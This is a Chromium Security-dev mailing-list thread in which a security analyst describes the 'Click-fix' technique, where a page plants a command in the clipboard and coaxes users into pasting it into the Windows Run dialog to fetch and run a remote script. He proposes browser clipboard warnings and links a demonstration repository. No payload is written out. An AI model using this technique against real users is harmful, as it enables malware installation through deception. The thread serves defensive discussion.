Groups keyboard shortcuts have been updated
Dismiss
See shortcuts
Click-fix: detecting and preventing malicious use of user clipboard
674 views
Skip to first unread message
Aaron Walton
Jan 9, 2025, 3:47:35 PMJan 9
to Security-dev
Hello Security-dev,
I reviewed open discussions and didn’t see reference to the following topic, but if it is being discussed somewhere I did not see, please let me know.
I work for a Managed Security Services Provider (MSSP), and we are seeing a heavy abuse of a tactic where a web page instructs the user to open the Windows Run dialog box with the hotkey Win+R, and have them paste in a malicious command with Ctrl+V that the web browser has preemptively copied into their clipboard.
Usually the web page does this under the guise of a problem with the browser or the guise of a CAPTCHA and this attack technique has become extremely popular, so it is within my interest to help identify solutions to help mitigate the effectiveness of the tactic. The malicious command copied to the clipboard generally retrieves and executes a remote script that will execute using PowerShell or mshta. This tactic is talked about as "Click-fix" since it originally had the user click a button to copy the script to fix the problem.
This is an example of the tactic, whereas, at the time of the user's visit, the browser has modified the user's clipboard requiring no action from them to copy it:
One possible solution is notifying the user when their clipboard is modified by a webpage. This type of notification is already done by some browser extensions in similar situations, such as MalwareByte's Browser Guard. The following is an example of a message a user could receive:
.png?part=0.1&view=1)
This is one possible solution, but consideration of multiple possible solutions is recommended.
To understand how the tactic works mechanically, I recommend this GitHub repo from JohnHammond: https://github.com/JohnHammond/recaptcha-phish .
Please let me know if you have any questions, but it has seemed important to raise this to your awareness due to how much we are seeing this technique used.
I reviewed open discussions and didn’t see reference to the following topic, but if it is being discussed somewhere I did not see, please let me know.
I work for a Managed Security Services Provider (MSSP), and we are seeing a heavy abuse of a tactic where a web page instructs the user to open the Windows Run dialog box with the hotkey Win+R, and have them paste in a malicious command with Ctrl+V that the web browser has preemptively copied into their clipboard.
Usually the web page does this under the guise of a problem with the browser or the guise of a CAPTCHA and this attack technique has become extremely popular, so it is within my interest to help identify solutions to help mitigate the effectiveness of the tactic. The malicious command copied to the clipboard generally retrieves and executes a remote script that will execute using PowerShell or mshta. This tactic is talked about as "Click-fix" since it originally had the user click a button to copy the script to fix the problem.
This is an example of the tactic, whereas, at the time of the user's visit, the browser has modified the user's clipboard requiring no action from them to copy it:
One possible solution is notifying the user when their clipboard is modified by a webpage. This type of notification is already done by some browser extensions in similar situations, such as MalwareByte's Browser Guard. The following is an example of a message a user could receive:
This is one possible solution, but consideration of multiple possible solutions is recommended.
To understand how the tactic works mechanically, I recommend this GitHub repo from JohnHammond: https://github.com/JohnHammond/recaptcha-phish .
Please let me know if you have any questions, but it has seemed important to raise this to your awareness due to how much we are seeing this technique used.
Nathan Parker
Jan 17, 2025, 2:55:57 PMJan 17
to Aaron Walton, Security-dev
Hi Aaron --
Thanks for sharing. This is an attack method we're aware of and we've also seen it increase in volume. We're looking at ways to better detect and flag pages that use this technique so that users aren't exposed to this social engineering in the first place.
-- Nathan
Aaron Walton
Jan 20, 2025, 2:26:30 AMJan 20
to Security-dev, npa...@chromium.org, Security-dev, Aaron Walton
Awesome. Glad to hear you guys are actively looking for ways to detect and flag those pages. Is there anything about this tactic that we can provide to help determine ways to detect and flag them? Would it help to have more examples of active pages or anything of that nature? Happy to help out however possible.
Its PaPPy
May 14, 2025, 5:31:49 PMMay 14
to Security-dev, Aaron Walton, npa...@chromium.org, Security-dev
I am seeing this more and more. It would be great if Chrome built in some detection for this. The method used by Malwarebytes does seem to work pretty well, but getting everyone to install a plugin is rather challenging.
ابو جنا
May 18, 2025, 11:04:46 AMMay 18
to Its PaPPy, Security-dev, Aaron Walton, npa...@chromium.org, ابو جنا
To unsubscribe from this group and stop receiving emails from it, send an email to security-dev...@chromium.org.
Reply all
Reply to author
Forward
0 new messages